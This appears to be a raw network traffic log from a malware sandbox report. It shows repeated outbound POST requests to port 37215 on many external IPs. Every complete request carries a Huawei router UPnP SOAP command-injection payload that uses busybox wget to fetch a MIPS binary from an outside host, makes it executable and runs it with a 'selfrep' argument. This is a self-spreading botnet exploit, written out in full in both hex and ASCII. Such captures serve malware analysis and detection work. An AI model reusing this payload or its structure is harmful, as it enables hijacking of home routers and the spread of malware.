3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1147192.168.2.133917699.177.134.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517843008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1148192.168.2.1356000157.239.162.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517879009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1149192.168.2.1345736197.161.17.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517918110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1150192.168.2.133707670.16.251.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517956018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1151192.168.2.133644641.188.140.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517975092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1152192.168.2.1341012175.108.55.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518023014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1153192.168.2.1351044157.241.17.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518055916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1154192.168.2.1340378172.44.170.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518399954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1155192.168.2.1360406157.248.237.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518424988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1156192.168.2.1348170197.117.68.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518454075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1157192.168.2.133454869.237.98.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518484116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
